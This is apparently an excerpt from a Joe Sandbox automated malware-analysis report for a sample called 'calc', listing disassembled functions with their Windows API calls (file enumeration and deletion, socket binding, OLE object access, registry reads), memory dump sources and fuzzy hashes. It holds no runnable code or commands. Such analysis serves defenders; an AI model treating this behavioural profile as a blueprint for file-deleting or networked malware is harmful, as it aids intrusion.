    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Find$File$CloseFirstNextSleep
    • String ID: *.*
    • API String ID: 1749430636-438819550
    • Opcode ID: 6d2f20d5f6c5e3ebaa02131d7ac99f738c988f0b90d2793fb151298a0e156791
    • Instruction ID: 14313086ed1824e1ac955e4be02adb7ecbe1729315f12b359723cfbb7ee217a5
    • Opcode Fuzzy Hash: 6d2f20d5f6c5e3ebaa02131d7ac99f738c988f0b90d2793fb151298a0e156791
    • Instruction Fuzzy Hash: 8241B031A04229AFDF10EF60EC85AEEBB74FF00324F5541ABE825A2191D779DE45CB58
    Function 00414FFA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87fileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,00479BFC,00000000,00479BFC,0047BD30,?,0040FF5E,00479BFC,00000000), ref: 00414E89
      • Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59
    • FindFirstFileW.KERNEL32(?,?), ref: 00415075
    • DeleteFileW.KERNEL32(?), ref: 004150D8
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004150EB
    • FindClose.KERNEL32(00000000), ref: 00415101
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$Find$AttributesCloseDeleteFirstFullNameNextPath
    • String ID: \*.*
    • API String ID: 1127339523-1173974218
    • Opcode ID: ecf88347c3510a8889fff522418eff3f172dc9695c36bd104de5b9d6ad17ff13
    • Instruction ID: 409b15486f08223be286d2985c7cc7ce5df5238f831beca23a735b92d1d425b1
    • Opcode Fuzzy Hash: ecf88347c3510a8889fff522418eff3f172dc9695c36bd104de5b9d6ad17ff13
    • Instruction Fuzzy Hash: E8319372C4022C9ADB20E7A0CC89EDB77BCAB19314F0405D7E519D2141EA399BC88F55
    Function 00430B6B Relevance: 7.7, APIs: 5, Instructions: 226comCOMMON
    Download Yara Rule
    APIs
    • OleInitialize.OLE32(00000000), ref: 00430BCF
    • CreateBindCtx.OLE32(00000000,?), ref: 00430C6D
    • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 00430CA2
    • CLSIDFromProgID.OLE32(00000000,?,0045C6D0), ref: 00430D3B
    • GetActiveObject.OLEAUT32(?,00000000,?), ref: 00430D5F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ActiveBindCreateDisplayFromInitializeNameObjectParseProg
    • String ID:
    • API String ID: 2624060339-0
    • Opcode ID: 4f6e1be64f9c14402ac62b78dcaaaf9d02ebe58348269858304ef1ec5c9bf00b
    • Instruction ID: da78810dc58ee67beca8740cb072a36e8d7e879c082b736ce8f307c953f0df69
    • Opcode Fuzzy Hash: 4f6e1be64f9c14402ac62b78dcaaaf9d02ebe58348269858304ef1ec5c9bf00b
    • Instruction Fuzzy Hash: D1713671900209AFDF04EBE1DC94CEEBBB9EF48358F10566AF401AB121DB39AD45CB58
    Function 0042F9C7 Relevance: 7.6, APIs: 5, Instructions: 122networkCOMMON
    Download Yara Rule
    APIs
    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA27
    • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA44
    • bind.WSOCK32(000000FF,?,00000010,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA5E
    • WSAGetLastError.WSOCK32(00000000,000000FF,?,00000010,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA6A
    • closesocket.WSOCK32(000000FF,00000000,000000FF,?,00000010,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA7C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorLast$bindclosesocketsocket
    • String ID:
    • API String ID: 2609815416-0
    • Opcode ID: e7397f1c144a3e631e766c81722d41783a29369c490b2386a7dce95c5e9ce37f
    • Instruction ID: 3a16f63b51b195d841c79802276cd2fb353c8446d2eaf561272c81bd1857b55e
    • Opcode Fuzzy Hash: e7397f1c144a3e631e766c81722d41783a29369c490b2386a7dce95c5e9ce37f
    • Instruction Fuzzy Hash: 1F41DA31700224ABDB10FB65D842ADDB774AF00368F90427FF915A7292CB78ED858788
    Function 00440FF0 Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0043F161: IsWindow.USER32(00000000), ref: 0043F18E
    • IsWindowVisible.USER32(?), ref: 00441030
    • IsWindowEnabled.USER32(?), ref: 0044103E
    • GetForegroundWindow.USER32 ref: 0044104B
    • IsIconic.USER32(?), ref: 00441059
    • IsZoomed.USER32(?), ref: 00441067
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$EnabledForegroundIconicVisibleZoomed
    • String ID:
    • API String ID: 292994002-0
    • Opcode ID: 823c9779afd878d97ecc99f1b56ef9ecf8a7d526435fc575a642dec1e6f9dd48
    • Instruction ID: 5347e6eeee2c35e3a3080e83de1525a4242f8176f48fdc4335f36dcb23dbdd43
    • Opcode Fuzzy Hash: 823c9779afd878d97ecc99f1b56ef9ecf8a7d526435fc575a642dec1e6f9dd48
    • Instruction Fuzzy Hash: 71019232701210ABF7216BAA6C8576B6358AF45755F04002BF905E7262CB5CDC8586AD
    Function 00454555 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
    Download Yara Rule
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00454570
    • GetCurrentProcessId.KERNEL32 ref: 0045457C
    • GetCurrentThreadId.KERNEL32 ref: 00454584
    • GetTickCount.KERNEL32 ref: 0045458C
    • QueryPerformanceCounter.KERNEL32(?), ref: 00454598
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
    • String ID:
    • API String ID: 1445889803-0
    • Opcode ID: ce49a519204e3efa3a38d4ccfecad025a25cbb3f5171558189020a5d7d08fa74
    • Instruction ID: cce3aeb063afa98f1ec8b005d038f7efac3a4b28e447dbd033245065016be6b7
    • Opcode Fuzzy Hash: ce49a519204e3efa3a38d4ccfecad025a25cbb3f5171558189020a5d7d08fa74
    • Instruction Fuzzy Hash: 74F0A471C00215EBCB20ABB4ED4859E77F4FB58246F851561ED01EB151E634DE44CBD9
    Function 00415D53 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00414513: RegOpenKeyExW.ADVAPI32(00000004,0045DC34,00000000,00000001,?,?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001), ref: 00414532
      • Part of subcall function 00414513: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000000,?,-0000076C,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001), ref: 00414549
      • Part of subcall function 00414513: RegCloseKey.ADVAPI32(?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001,-0000076C,00000001,0045DC34,00000004,?), ref: 0041455A
    • mouse_event.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415DC9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseOpenQueryValuemouse_event
    • String ID: 1$Control Panel\Mouse$SwapMouseButtons
    • API String ID: 3120867179-1333076132
    • Opcode ID: 4397a220816a50afef8ed950c651321602ee1f04abf46bd2a497226114d5da3a
    • Instruction ID: 64686344fb700abdcb6185f0ad728c85fdaca3d4a8d255f7137e8337f52e2b96
    • Opcode Fuzzy Hash: 4397a220816a50afef8ed950c651321602ee1f04abf46bd2a497226114d5da3a
    • Instruction Fuzzy Hash: 3A012BB6B50700FEE3101670ACCAFFB215CE780359F24853BBB12D10C2E1E84EC58129
    Function 00441961 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
    Download Yara Rule
    APIs
    • __time32.LIBCMT ref: 00441976
      • Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
      • Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Time$FileSystem__aulldiv__time32
    • String ID: 0zG$XzG
    • API String ID: 946151114-99799804
    • Opcode ID: 0a5a7a05a70f3a69a59080a7637f812f2389dac8b37ab6b771aeb470bcc81c72
    • Instruction ID: 783faa91bd414bdfaf2ef5467989aa4ddd3d2fe93f43507dbe2697d40eb1a71c
    • Opcode Fuzzy Hash: 0a5a7a05a70f3a69a59080a7637f812f2389dac8b37ab6b771aeb470bcc81c72
    • Instruction Fuzzy Hash: 6321B3732147058FE728CF65D8D069BB3E2FBC8310F218A7DD29543340C7B5A9458B98
    Function 00425838 Relevance: 4.6, APIs: 3, Instructions: 117fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileW.KERNEL32(00000000,?), ref: 00425866
    • FindNextFileW.KERNEL32(00000000,?), ref: 004258B2
    • FindClose.KERNEL32(00000000,000000FF,00000000), ref: 004258D2
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Find$File$CloseFirstNext
    • String ID:
    • API String ID: 3541575487-0
    • Opcode ID: b3e3c202836090fb482b8cc2be890d2cc70b88b3b0e828bc102752b99fec1807
    • Instruction ID: 387268721af71cf1c6543a3d80bd9fbe587f0a90bbb93b6ddb93adfe5e295de9
    • Opcode Fuzzy Hash: b3e3c202836090fb482b8cc2be890d2cc70b88b3b0e828bc102752b99fec1807
    • Instruction Fuzzy Hash: 2931B271700624AFDB14FF69EC44AAE73A8AF95324F5100ABF405DB2A1DB78DD848B58
    Function 004240D8 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
    Download Yara Rule
    APIs
    • SetErrorMode.KERNEL32(00000001), ref: 004240E5
    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00424183
    • FreeLibrary.KERNEL32(?), ref: 004241D9
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Free$DiskErrorLibraryModeSpace
    • String ID:
    • API String ID: 196386347-0
    • Opcode ID: c2e8503d3a993c625ea151c938098d22a9cff153788bfcd3cf30d0347fe6760d
    • Instruction ID: b200f007bc7906c09fc1daa9ee030b72ce8bb0e7a5c992d7f6e88266f231a153
    • Opcode Fuzzy Hash: c2e8503d3a993c625ea151c938098d22a9cff153788bfcd3cf30d0347fe6760d
    • Instruction Fuzzy Hash: FD318E31A00528EBCF04EF95EC448EEBBB8FF94310B41416BF901A7161DB38AD91CB99
    Function 00414E16 Relevance: 4.5, APIs: 3, Instructions: 21fileCOMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(004102DA), ref: 00414E22
    • FindFirstFileW.KERNEL32(004102DA,?), ref: 00414E37
    • FindClose.KERNEL32(00000000), ref: 00414E47
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FileFind$AttributesCloseFirst
    • String ID:
    • API String ID: 48322524-0
    • Opcode ID: 09d9633bee1d13ec756f5857c6e115d2227fef6d1876f1372ecb636deebfb824
    • Instruction ID: d6754715d604e333232b506108b618bc4b0216c56dbbe0cb7bf54d6593a8388b
    • Opcode Fuzzy Hash: 09d9633bee1d13ec756f5857c6e115d2227fef6d1876f1372ecb636deebfb824
    • Instruction Fuzzy Hash: C6E04F30500A19DBDF105F34EC8C5D93BA9BB44326F004360F529D11E0D734DD805A48
    Function 00444317 Relevance: 3.8, Strings: 1, Instructions: 2537COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID: DEFINE
    • API String ID: 0-476076250
    • Opcode ID: f3c67067ba55632358e7375b1a9d14f61ad4dbc5eccbff052c09a53e6ea783e4
    • Instruction ID: 7aecf970a3a8e93d399c44997cf67bf7929d5b2573a6a00c81d727fb5452ea2e
    • Opcode Fuzzy Hash: f3c67067ba55632358e7375b1a9d14f61ad4dbc5eccbff052c09a53e6ea783e4
    • Instruction Fuzzy Hash: 9623C270904689CFEF29CF28C8847AA7BE1BF56314F18425BEC9587382D379D845CB99
    Function 00442AF9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
    Download Yara Rule
    APIs
    • __time32.LIBCMT ref: 00442B0E
      • Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
      • Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Time$FileSystem__aulldiv__time32
    • String ID: +D
    • API String ID: 946151114-3824217212
    • Opcode ID: eb6d8e38119604e5ecbc05b95a4c0e3d0631e116cc63d23bbe6006d2fa1c343e
    • Instruction ID: 3f4e2e8da5fcfa9112af9d4ed207b4293ac1f413c7f7c23dbf4774f4b5517054
    • Opcode Fuzzy Hash: eb6d8e38119604e5ecbc05b95a4c0e3d0631e116cc63d23bbe6006d2fa1c343e
    • Instruction Fuzzy Hash: 132160B27057058FF728CE26D8C169AB3E2FBC8310F10CA7DE59547349DBB5A9098B94
    Function 00421E0D Relevance: 3.3, APIs: 2, Instructions: 273COMMON
    Download Yara Rule
    APIs
    • WritePrivateProfileSectionW.KERNEL32(00000000,00000004,?), ref: 004220D9
    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004220EF
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: PrivateProfileWrite$SectionString
    • String ID:
    • API String ID: 1636597714-0
    • Opcode ID: 32fe7dafa4b963cc2645fbb9382398e8a6300ba2dfaeee798067870883725fb7
    • Instruction ID: 41e22bb6b735dafa583f05a5a75da0cc7ce4db423ea27564a8c965bf69171114
    • Opcode Fuzzy Hash: 32fe7dafa4b963cc2645fbb9382398e8a6300ba2dfaeee798067870883725fb7
    • Instruction Fuzzy Hash: B891A331A00224DBDF14EF65D8815AEB3B0EF14354B5640ABED469B262E77CDD82CB89
    Function 0042320D Relevance: 3.0, APIs: 2, Instructions: 46fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileW.KERNEL32(00000000,?), ref: 0042323A
    • FindClose.KERNEL32(00000000), ref: 0042325E
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: 7770723f4f9b996c252b264d8fe0422cad5cd13d76bb5b2bdba4b77e072fc959
    • Instruction ID: c4933798ba476dde919d29639dc325125ccc6a047a15631857b1ceac9a992607
    • Opcode Fuzzy Hash: 7770723f4f9b996c252b264d8fe0422cad5cd13d76bb5b2bdba4b77e072fc959
    • Instruction Fuzzy Hash: BA01AC35600124EFDB04EFB4EC49A9A7368EF04315F45459BF515E7151DB7CED408BA8
    Function 0041FE6D Relevance: 3.0, APIs: 2, Instructions: 15windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
    • FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: dd82efffa5ef5c9c6af22be833fc05ef6f0753360673561712eceafa60732e9f
    • Instruction ID: c2c8ca3dea8f0c5a38abd3087de055dd5e24164f276729080913858088cce966
    • Opcode Fuzzy Hash: dd82efffa5ef5c9c6af22be833fc05ef6f0753360673561712eceafa60732e9f
    • Instruction Fuzzy Hash: 0FD0A7342C8303FFF33017648D0AF5A35105F48F23F508635B356A81E58BA44C45DA2E
    Function 00450F74 Relevance: 1.7, APIs: 1, Instructions: 246COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,00000000,?,004515D4,?,?,00000008,0044BBEC,?,?), ref: 00451169
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
